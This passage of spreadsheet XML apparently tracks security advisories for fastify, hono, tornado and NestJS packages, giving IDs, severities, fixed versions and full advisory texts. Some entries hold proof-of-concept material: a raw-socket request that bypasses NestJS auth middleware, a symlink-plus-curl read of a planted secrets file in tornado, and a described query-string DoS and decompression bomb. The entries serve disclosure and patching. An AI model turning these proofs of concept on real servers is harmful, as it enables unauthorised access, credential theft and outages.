          <t>CVE-2026-92081</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>5.12.5</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr"/>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fastify` crashes with an uncaught `ERR_HTTP2_INVALID_CONNECTION_HEADERS` exception when a route that registers a response trailer via `reply.trailer()` is served over HTTP/2. Fastify unconditionally adds the `Transfer-Encoding: chunked` header when a trailer is set, which is forbidden on HTTP/2, so Node.js throws while serializing the response headers. The exception is not caught and becomes an uncaughtException, terminating the Node.js process.
One unauthenticated HTTP/2 request to any route that uses trailers is enough to crash the server, dropping all in-flight requests, and the request can be repeated to keep the process down. Applications are affected only when HTTP/2 is enabled (`http2: true`) and at least one route registers a trailer. HTTP/1.x responses are not affected.
### Patches
Upgrade to `fastify` `5.12.5` or later.
### Workarounds
Avoid registering response trailers with `reply.trailer()` on routes served over HTTP/2 until upgrading.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92081</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93981</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>npm:hono</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr">
        <is>
          <t>4.13.7</t>
        </is>
      </c>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr"/>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>### Summary
`hono/jsx` does not HTML-escape a plain string placed directly as a child or `fallback` of `Suspense` or `ErrorBoundary`, as the only child of a `Context.Provider`, or as the root value of `renderToString()` / `renderToReadableStream()` from `hono/jsx/dom/server`. Such a string is emitted as markup instead of text.
### Details
These paths stringify their input and treat the result as already-escaped HTML, so a plain string passes through unchanged. Notable cases:
- `Suspense`: a string child, or a string `fallback` while a child suspends. With streaming, the fallback reaches the browser in the initial chunk.
- `ErrorBoundary`: a string child alongside an asynchronous sibling. The all-synchronous case was fixed in 4.11.7 (GHSA-9r54-q6cx-xmh5).
- `Context.Provider`: a single string child. Multiple children are escaped.
- `hono/jsx/dom/server`: a string, or an array containing strings, passed as the root.
A lone `{children}` forwarded by a wrapper component is enough to reach these paths. Strings wrapped in an element, values from `raw()` or the `html` helper, and client-side rendering with `hono/jsx/dom` are not affected.
### Impact
An attacker who controls a string rendered in an affected position can inject arbitrary HTML into the server-rendered page, leading to cross-site scripting under the application's origin.
This issue affects applications that render untrusted strings directly in one of the positions above during server-side rendering.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93981</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr"/>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>## Summary
`HTTPServerRequest.__init__` in `tornado/httputil.py` parses the URL query string via
`parse_qs_bytes()` with no field-count limit — while the sibling POST-body parsing path
(`parse_body_arguments`) received a `max_num_fields=1000` cap added earlier in this exact
same release (v6.5.8, commit `8d6363ed`), explicitly to bound parsing cost for the identical
underlying primitive. This leaves the query-string path with the resource-exhaustion exposure
the body-path fix was meant to close.
**File**: `tornado/httputil.py`, line 553 (`HTTPServerRequest.__init__`)
### Root Cause
```python
# tornado/httputil.py:553 (before fix)
self.arguments = parse_qs_bytes(self.query, keep_blank_values=True)
```
Compare with the POST-body path fixed one commit earlier in the same release:
```python
# tornado/httputil.py:1038-1041
uri_arguments = parse_qs_bytes(
    body,
    keep_blank_values=True,
    max_num_fields=config.urlencoded.max_arguments,  # default 1000
)
```
Both call sites funnel through the same `tornado.escape.parse_qs_bytes` (a thin wrapper over
`urllib.parse.parse_qs`), which is exactly why `max_num_fields` was added to
`urllib.parse.parse_qsl` upstream — to let frameworks bound field count. The fix was applied
only to the body path; the query-string path was missed.
The request line + headers together are capped at `max_header_size` (default 65536 bytes), so
this is not literally unbounded, but a single ~64KB request line can carry thousands of short
`key=value` pairs — far beyond the 1000-field limit the maintainer judged appropriate for the
structurally identical body case.
### Attack Scenario
1. Attacker sends a `GET` request whose query string is packed with thousands of short fields
   (e.g. `k0=1&amp;k1=1&amp;...&amp;k7799=1`, ~61KB), fitting comfortably under `max_header_size`. No
   authentication, cookies, or prior state required.
2. Tornado accepts and parses this with no field-count cap, unlike the equivalent POST-body
   request (which is correctly rejected with 400 once &gt;1000 fields are present).
3. Parsing thousands of fields is CPU work performed synchronously inside Tornado's
   single-threaded `IOLoop`. Several such requests in flight concurrently stall the event
   loop, delaying processing of *all* other connections on that loop — not just the
   attacker's own request.
### Verification (dynamic, local reproduction against v6.5.8)
Ran the unmodified v6.5.8 source directly (no external dependencies needed) with a minimal
`tornado.web.Application` on `127.0.0.1:8888`.
- Identical 7800-field/~61KB payload sent as GET query string → `200 OK`; sent as POST body
  (`application/x-www-form-urlencoded`) → `400 Bad Request` (correctly rejected by the
  existing `max_num_fields` body-path limit). This confirms the asymmetry directly.
- Per-request parse cost: baseline (`/?a=1`) averaged 1.86ms; the 7800-field query string
  averaged 25.1ms (~13x).
- Event-loop-blocking amplification (raw-socket test, isolating server-side stall from
  client overhead): with 10 sequential baseline probe requests fired with no load, average
  latency was 1.47ms (max 5.9ms). With 5 concurrent 61KB/7800-field requests in flight,
  the same baseline probes averaged 13.0ms (max 118.1ms) — an **8.9x average slowdown** for
  unrelated clients, produced by ~305KB of unauthenticated attacker traffic.
### Impact
All Tornado servers/applications are affected — this triggers on every request with a query
string, independent of application/handler logic. An unauthenticated, unprivileged remote
attacker can measurably degrade response times for all other clients sharing the same
`IOLoop`, using a small amount of bandwidth and no special conditions. This is an
availability/DoS concern; no confidentiality or integrity impact.
### Recommended Fix
```python
# tornado/httputil.py — HTTPServerRequest.__init__
if uri is not None:
    self.path, sep, self.query = uri.partition("?")
try:
    self.arguments = parse_qs_bytes(
        self.query,
        keep_blank_values=True,
        max_num_fields=_DEFAULT_PARSE_BODY_CONFIG.urlencoded.max_arguments,
    )
except ValueError as e:
    raise HTTPInputError("Invalid query string: %s" % e) from e
```
This reuses the existing `ParseUrlEncodedConfig.max_arguments` default (1000) via the
module's `_DEFAULT_PARSE_BODY_CONFIG`, matching the POST-body limit and honoring any global
override via `set_parse_body_config()`. The `try/except` is necessary because — unlike
`parse_body_arguments`, which already wraps its call and converts `ValueError` into a clean
`HTTPInputError`/400 — the query-string call site currently has no such handling, so without
it, a request exceeding the limit would raise an uncaught `ValueError` instead of a clean 400.
Verified: with the fix applied, requests with ≤1000 query-string fields are unaffected;
requests with &gt;1000 fields are rejected with `400 Bad Request` (consistent with the POST-body
behavior); Tornado's own `httputil_test` and `web_test` suites (256 tests) pass unchanged.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/microservices</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr">
        <is>
          <t>11.2.5, 12.0.3</t>
        </is>
      </c>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr"/>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>## Summary
A peer that can open a TCP connection to a NestJS microservice using the built-in TCP
transport can make the server process allocate memory without limit, on either side of the
connection, until the process is killed by the OS or by its container memory limit. No
authentication, no credentials, and no valid message are required.
Applications are affected only if they start a microservice with `Transport.TCP` and the
transport's port is reachable by an untrusted peer.
## Affected versions
| Package | Affected | Patched |
|---|---|---|
| `@nestjs/microservices` | `&gt;= 12.0.0, &lt; 12.0.3` | **12.0.3** |
| `@nestjs/microservices` | `&lt; 11.2.5` | **11.2.5** |
The same code is present in the 10.x line and earlier. Those lines are end-of-life and
will not receive a patch; upgrade to a supported major.
Only `@nestjs/microservices` is affected. No other package needs updating for this issue.
## Details
Two independent paths let one peer grow the heap without bound.
### Partial packets are buffered with nothing to reap them
The TCP transport frames messages as `&lt;length&gt;#&lt;payload&gt;`. A peer may declare a length,
send part of the payload, and then stop. `JsonSocket` keeps the partial payload buffered
while it waits for the rest, and nothing ever reclaimed it: there was no socket timeout, no
cap on the number of connections, and no tracking of accepted sockets.
`maxBufferSize` did not close this. It caps a single connection, defaulting to 128M
characters, and is enforced per connection, so the effective ceiling was the number of
connections an attacker chose to open.
Ten connections that each send 20MB and then go silent:
| | rss | heapUsed |
|---|---|---|
| baseline | 152.3MB | 28.1MB |
| after 200MB sent, all stalled | 561.2MB | 229.5MB |
The memory was held for as long as the connections stayed open. Closing them released it,
so a peer could hold it indefinitely at negligible cost to itself.
### Response backpressure was ignored
`JsonSocket#handleSend` discarded the return value of `socket.write`. A peer that issues
requests and never reads the responses therefore made the process queue every response in
memory, with no ceiling and no signal to stop producing more.
Thirty requests from a client whose stream is paused, against a handler returning an 8MB
payload, grew rss from 152.4MB to 419.1MB. The amplification here is roughly 1:1, because
the response size is set by the application rather than by the attacker; the defect is that
the server buffers all of it rather than applying backpressure or giving up.
## Impact
An unauthenticated peer that can reach the transport's port can drive the process to an
out-of-memory kill. Under a container memory limit this is fast and repeatable, and it
restarts the pod rather than merely degrading it.
There is no confidentiality or integrity impact. Nothing is read, written, or executed;
the failure mode is availability only.
Applications are not affected if the TCP transport is not used, or if the transport's port
is reachable only by trusted peers.
## Patches
Upgrade `@nestjs/microservices` to **12.0.3** or **11.2.5**.
Three changes landed together:
- **A stall timer drops a peer that stops sending mid-packet.** It is armed only while a
  packet is partially received and is refreshed on every read, so a slow but progressing
  transfer is never interrupted and a peer sitting idle between packets is left alone.
  Configurable as `incompleteMessageTimeout`, default 30000ms.
- **Reading is suspended while a peer's outgoing buffer is backed up** and resumes on
  `drain`, so a peer that stops reading cannot keep issuing requests.
- **Responses queued for a peer that reads nothing are capped.** Suspending reads is not
  sufficient on its own, because message handlers are asynchronous: a burst of pipelined
  requests is dispatched before the first response is written, and those responses still
  queue. Configurable as `maxSendBufferSize`, default 128MB.
Both limits are configurable on the server and on the client, and either can be disabled by
setting it to `0`.
### Behaviour change
Both limits are enabled by default, following the precedent set by `maxBufferSize`. A peer
that stops sending mid-packet for 30 seconds, or that lets more than 128MB of responses
queue unread on a single connection, is now disconnected where previously it was not.
The send cap can also drop a peer that is genuinely reading, if responses are produced
faster than the socket drains for long enough. The default is set high for that reason.
Applications that stream very large responses to deliberately slow consumers should raise
`maxSendBufferSize` or set it to `0`.
## Workarounds
For anyone who cannot upgrade immediately:
- **Restrict who can reach the port.** The TCP transport is designed for trusted
  service-to-service traffic. A network policy, security group, or L4 firewall that limits
  the port to known peers removes the exposure entirely, and is worth doing regardless of
  version.
- **Lower `maxBufferSize`.** This reduces what a single connection can pin on the receive
  side. It does not bound the total, because the limit is per connection and the number of
  connections is not capped, and it does nothing for the response-queueing path.
- **Supply a custom `socketClass`.** An application-provided socket class can implement its
  own idle timeout and backpressure handling. This is the only pre-patch mitigation that
  addresses the sending side.
Setting a process memory limit does not mitigate this. It converts the failure from an
out-of-memory kill of the host into an out-of-memory kill of the process.
## Credit
Reported by Salman Aljardan, who provided a detailed write-up and self-contained proofs of
concept for each issue, and coordinated disclosure.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/platform-fastify</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr">
        <is>
          <t>11.2.4, 12.0.2</t>
        </is>
      </c>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr"/>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>| Field | Value |
| --- | --- |
| Ecosystem | npm |
| Package | `@nestjs/platform-fastify` |
| Affected versions | `&gt;= 12.0.0, &lt; 12.0.2` and `&lt; 11.2.4` |
| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |
### Summary
On the Fastify adapter, an HTTP request that uses an **absolute-form request target** (`GET http://host/path HTTP/1.1`
instead of `GET /path HTTP/1.1`) reaches the route handler without running the path-scoped Nest middleware bound to
that route. Applications that enforce authentication or authorization in middleware execute the protected handler
with those checks skipped.
### Impact
Any application that
- uses `@nestjs/platform-fastify`, and
- binds middleware to specific paths via `MiddlewareConsumer.forRoutes(...)` or `.exclude(...)`, and
- is reachable by a client that controls the raw request line.
Node's HTTP server accepts absolute-form targets, so no special server configuration is needed. Exposure is reduced
when a reverse proxy in front of the application rewrites the request target to origin-form, which most do.
Where the bypassed middleware performs authentication or authorization, the result is an authentication or
authorization bypass. Where it performs logging, rate limiting or body handling, those are silently skipped instead.
### Details
Fastify's router (`find-my-way`) resolves an absolute-form target to its path before matching, so the route handler
is dispatched normally. Two places on the middleware side matched against the **raw** request target instead:
1. The bundled copy of the `@fastify/middie` engine at `packages/platform-fastify/adapters/middie/fastify-middie.ts`.
   NestJS carried this fork to apply an earlier path-decoding fix and it did not track the upstream absolute-form fix
   released in `@fastify/middie@9.3.4`.
2. `FastifyAdapter`'s own re-check in `createMiddlewareFactory()`, which tests the middleware path regexp against
   `req.originalUrl`.
Both normalized and percent-decoded the target, but neither resolved absolute-form to a path, so the router and the
middleware layer disagreed about which path was being requested.
A second, related defect contributed. Because the adapter always passes `routerOptions` (to install the version
constraint), Fastify did not reflect the deprecated **top-level** router options (`ignoreTrailingSlash`,
`ignoreDuplicateSlashes`, `caseSensitive`, `useSemicolonDelimiter`) in `initialConfig.routerOptions`, which is what
the middleware engine reads. Applications passing those options at the top level had middleware normalize paths
differently from the router, which widened the mismatch.
### Proof of concept
```ts
@Controller('users')
export class UsersController {
  @Get()
  findAll() {
    return 'protected data';
  }
}
@Module({ controllers: [UsersController] })
export class AppModule implements NestModule {
  configure(consumer: MiddlewareConsumer) {
    consumer
      .apply((req, res) =&gt; res.end('blocked by auth middleware'))
      .forRoutes({ path: 'users', method: RequestMethod.GET });
  }
}
```
`supertest` and `light-my-request` always emit origin-form targets, so the request has to be written to the socket:
```js
const { connect } = require('node:net');
const socket = connect(3000, '127.0.0.1', () =&gt; {
  socket.write(
    'GET http://127.0.0.1:3000/users HTTP/1.1\r\n' +
      'Host: 127.0.0.1:3000\r\n' +
      'Connection: close\r\n\r\n',
  );
});
socket.pipe(process.stdout);
```
Observed on an affected version: `protected data` — the middleware did not run.
Expected, and observed on a patched version: `blocked by auth middleware`.
### Patches
Fixed in **12.0.2** and **11.2.4**. Upgrading to **12.0.3** or **11.2.5** is recommended.
- The bundled `@fastify/middie` fork was removed and the package now depends on `@fastify/middie@9.3.4`, which
  resolves absolute-form targets before matching.
- The adapter resolves absolute-form targets in its own route check, mirroring `find-my-way`.
- Deprecated top-level Fastify router options are folded into `routerOptions` so the middleware engine and the
  router normalize paths identically.
### Workarounds
If you cannot upgrade, reject non-origin-form request targets before middleware runs. Register the hook on the
Fastify instance **before the application is initialized**, so that it runs ahead of the middleware engine's own
`onRequest` hook, and confirm with the request above that the rejection takes effect:
```ts
const adapter = new FastifyAdapter();
adapter.getInstance().addHook('onRequest', (request, reply, done) =&gt; {
  const target = request.raw.url ?? '';
  // "*" is the legitimate request target of "OPTIONS * HTTP/1.1"
  if (target[0] !== '/' &amp;&amp; target !== '*') {
    reply.code(400).send();
    return;
  }
  done();
});
```
Rejecting or normalizing absolute-form targets at a reverse proxy in front of the application is equally effective.
### Credit
Reported by ZeroVuln Labs.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr"/>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>### Summary
StaticFileHandler allows an unauthenticated attacker to read arbitrary files from the server's filesystem by requesting a path that resolves to a symbolic link placed inside the static root directory. Any application that serves user-uploadable content, or whose static directory is populated by a build/deploy pipeline that creates symlinks (e.g. npm link, webpack, Docker volume mounts, CDN sync tools), is affected. An attacker who can trigger the creation of a symlink pointing outside the static root—or exploit one that already exists—can retrieve sensitive files such as /etc/passwd, private keys, configuration files, or application secrets.
### Details
The vulnerability is in tornado.web.StaticFileHandler, specifically in the interaction between two methods in [tornado/web.py](vscode-webview://1grdaaa6v64itrol06qu70pq3d1b9h9im5c3npvvc9snaprc1q9f/tornado/web.py):
- [get_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2932) uses `os.path.abspath()` to resolve the requested path:
- [validate_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2935) uses the same `os.path.abspath()` on the root, then performs a string prefix check:
`os.path.abspath()` normalises . and .. segments but does not resolve symbolic links. As a result, a path like `/var/www/static/link` passes the `startswith("/var/www/static/")` check regardless of where `link` actually points.
Immediately after, `os.path.exists()` and `os.path.isfile()`  **do follow symlinks**, so the file they ultimately open is the symlink's target. The fix would be to replace os.path.abspath() with os.path.realpath() in both methods, so the resolved real path of the symlink target is validated against the root, not just its string representation inside the static directory.
### PoC
_Complete instructions, including specific configuration details, to reproduce the vulnerability._
Prerequisites: Python 3.x, Tornado installed.
1. Create the environment
```
mkdir -p /tmp/static
echo "DB_PASSWORD=s3cr3t" &gt; /tmp/secret.conf   
ln -s /tmp/secret.conf /tmp/static/config.conf 
```
2. Minimal vulnerable server (server.py):
```
import tornado.web, tornado.ioloop
app = tornado.web.Application([
    (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "/tmp/static"}),
])
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
```
3. Exploit:
`curl http://localhost:8888/static/config.conf`
### Impact
Any application using StaticFileHandler is potentially affected if:
- the static directory contains symlinks pointing outside it (common with build tooling), or
- the application allows file uploads into the static directory without stripping symlinks.
An unauthenticated remote attacker can read any file readable by the process user: application secrets, private TLS keys, database credentials, /etc/shadow, SSH keys, or source code (depending on the process's filesystem permissions).</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>An unbounded memory accumulation (decompression bomb) in `tornado.curl_httpclient.CurlAsyncHTTPClient` — the client-side sibling gap of CVE-2026-49855 — verified end-to-end on the 2026-08-15 master snapshot (`6.6.dev1`) and present unchanged in the latest release tag `v6.5.8` and on master (checked 2026-08-17). When a Tornado application configures the curl client (the documented deployment for proxy support / advanced TLS options) and `fetch()`es an attacker-chosen or attacker-compromised URL with default `decompress_response=True`, a malicious server replying `Content-Encoding: gzip` with a ~2.8 MB wire bomb drove the client's RSS from 30,884 kB to **1,032,100 kB (~1008 MB) in 3.18 s** (~350 MB/s, monotonic, no plateau) until the kernel OOM-killed the process (exit 137, cgroup `OOMKilled=true`) — with the transfer only 67% complete and **no client-side size check ever intervening**: `curl_httpclient.py` contains zero occurrences of `max_body_size`/`MAXFILESIZE`. The identical bomb against the default `SimpleAsyncHTTPClient` fails cleanly at ~65 MB, because every size gate CVE-2026-49855 added (compressed CL, chunked total, cumulative decompressed size — `http1connection.py:620,676,742`) lives in code the curl client never executes. This is a distinct component from the published advisory (which fixed `_GzipMessageDelegate`/`SimpleAsyncHTTPClient` only) and from the other curl-client advisories (credential handle-reuse GHSA-pw6j-qg29-8w7f, header CRLF GHSA-w235-7p84-xx57); the file's full commit history (latest 2026-06-17) shows no response-size work.
## Details
`tornado/curl_httpclient.py` (line numbers identical on master `6.6.dev1`, `v6.5.8`, and the audited snapshot):
```python
"buffer": BytesIO(),                                  # :202 — plain BytesIO, no accounting
...
else:
    write_function = buffer.write                     # :359 — every decompressed byte lands here
curl.setopt(pycurl.WRITEFUNCTION, write_function)     # :360
...
if request.decompress_response:                       # default True (HTTPRequest)
    curl.setopt(pycurl.ENCODING, "gzip,deflate")      # :373-374 — libcurl advertises + auto-decodes
```
libcurl decompresses the response **before** invoking `WRITEFUNCTION`, so the callback receives decompressed bytes, which are appended to an unbounded `BytesIO` until the transfer ends or the process dies. The only ceiling is `request_timeout` (default 20 s) — at zlib's hundreds of MB/s that still permits many GB of accumulation; the PoC raised it to 300 s and the 1 GiB cgroup cap was hit in 3.2 s regardless. There is no `pycurl.MAXFILESIZE`, no `max_buffer_size`/`max_body_size` plumbing (the constructor accepts no body-size option), and `streaming_callback` users fare no better (the callback variant at `:353-356` also performs zero accounting).
Contrast — `SimpleAsyncHTTPClient` path (`tornado/http1connection.py`), all absent from the curl path:
```python
if cast(int, content_length) &gt; self._max_body_size:        # :620  Content-Length gate
if total_size &gt; self._max_body_size:                       # :676  chunked total gate
if self._decompressed_body_size &gt; self._max_body_size:     # :742  CVE-2026-49855 decompressed gate
```
